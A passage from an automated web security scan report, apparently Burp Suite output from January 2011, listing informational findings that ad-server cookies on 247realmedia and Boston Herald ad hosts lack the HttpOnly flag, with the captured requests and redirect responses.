Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

11.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

11.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

11.514. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.515. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n');

...[SNIP]...

11.516. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.517. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
